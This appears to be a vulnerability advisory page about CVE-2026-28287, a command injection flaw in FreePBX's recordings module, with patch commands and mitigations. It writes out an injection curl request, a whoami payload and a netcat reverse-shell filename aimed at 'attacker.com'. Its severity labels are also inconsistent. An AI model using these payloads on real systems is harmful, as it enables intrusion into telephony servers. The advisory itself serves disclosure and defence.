FreePBX, Command Injection, CVE-2026-28287 (Critical)

Listen to this Post

CVE-2026-28287 is a critical command injection vulnerability residing in the recordings module of FreePBX, an open-source GUI for managing Asterisk PBX systems . The vulnerability stems from insufficient sanitization of user-supplied input passed to specific AJAX endpoints within the module . Authenticated POST parameters, such as `file` and filenames[], are not properly neutralized before being incorporated into shell commands executed by the underlying media handling subsystem . An attacker with access to the FreePBX Administration panel can craft a malicious filename containing command delimiters (like ;, &&, or `). When this unsanitized input is passed to a shell operation—for example, a command that processes an audio file—the injected commands are executed by the operating system . This allows the attacker to break out of the intended command and run arbitrary operating system commands on the host . Successful exploitation results in remote code execution (RCE) as the `asterisk` user, which can lead to full system compromise, including data theft, installation of backdoors, and disruption of telephony services . The vulnerability affects FreePBX versions 16.0.17.2 up to, but not including, 16.0.20, and versions 17.0.2.4 up to, but not including, 17.0.5 . Patches have been released in versions 16.0.20 and 17.0.5, and immediate updating is the recommended course of action .

dailycve form:

Platform: FreePBX GUI
Version: 16.0.17.2-16.0.20,17.0.2.4-17.0.5
Vulnerability : Command Injection
Severity: 8.6 High
date: 05/03/2026

Prediction: Patches Released

What Undercode Say:

Analytics:

  • CVSS Vector: `CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`
    – Attack Vector: Network
  • Privileges Required: High (Authenticated Admin Access)
  • User Interaction: None
  • CWE: CWE-78 (OS Command Injection)
  • Scope: Unchanged (affects only the vulnerable component)
  • Impact: Complete loss of confidentiality, integrity, and availability for the vulnerable system.

Bash Commands & Code:

Check FreePBX version from the command line
fwconsole ma list | grep -E "^(framework|recordings)"
Check recordings module version specifically
fwconsole ma info recordings
Example of vulnerable POST request pattern (conceptual)
curl -k -X POST -H "Cookie: <authenticated_session_cookie>" \
--data "action=upload&file=;id;.mp3" \
https://<target_ip>/recordings/ajax.php
Example of command injection payload
payload: "test.mp3; whoami > /tmp/attacker.txt; echo .mp3"
Patch command (if using older repo)
fwconsole ma upgrade recordings
fwconsole ma upgrade framework
fwconsole reload
Verify patch
rpm -q freepbx --qf '%{name}-%{version}-%{release}\n' For RPM-based installs
dpkg -l | grep freepbx For Debian-based installs

How Exploit:

  1. Precondition: Attacker must have valid credentials to access the FreePBX Administrator Control Panel (ACP) .
  2. Crafted Request: Attacker navigates to a feature in the recordings module that handles file uploads or naming (e.g., uploading a new recording or renaming an existing one).
  3. Injection Point: In the filename field, the attacker inputs a malicious string, such as legit_name.mp3; nc -e /bin/sh attacker.com 4444. The application fails to sanitize the special characters (;, “) .
  4. Shell Execution: The backend system constructs a shell command using this filename (e.g., /bin/sh -c /usr/bin/sox /tmp/legit_name.mp3; nc -e /bin/sh attacker.com 4444 ...).
  5. Code Execution: The shell interprets the semicolon as a command separator and executes the injected `nc` (netcat) command, providing the attacker with a reverse shell on the server as the `asterisk` user .

Protection from this CVE:

  1. Immediate Patch: Update the `recordings` module to version 16.0.20 (for FreePBX 16) or 17.0.5 (for FreePBX 17) immediately using `fwconsole ma upgrade recordings` .
  2. Access Control: Restrict access to the FreePBX Administrator Control Panel. Use the FreePBX Firewall module to allow access only from trusted IP addresses .
  3. Principle of Least Privilege: Ensure that only essential personnel have administrative accounts. Consider using MFA or SAML modules for an extra layer of security on admin accounts .
  4. Input Validation (Long-term): As a vendor best practice, implement strict allowlist-based validation for all file inputs. Avoid passing user-controlled filenames directly to shell commands.

Impact:

  • Remote Code Execution: An attacker can execute arbitrary system commands .
  • Full System Compromise: Gaining a shell as the `asterisk` user allows an attacker to install malware, ransomware, or cryptominers .
  • Data Breach: Access to voicemails, call recordings, and call logs, compromising sensitive business communications.
  • Service Disruption: An attacker could shut down or disrupt the entire PBX service, halting all business telephony.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Previous

D-Link DIR-513, Stack Buffer Overflow, CVE-2025-70223 (Critical)

Scroll to Top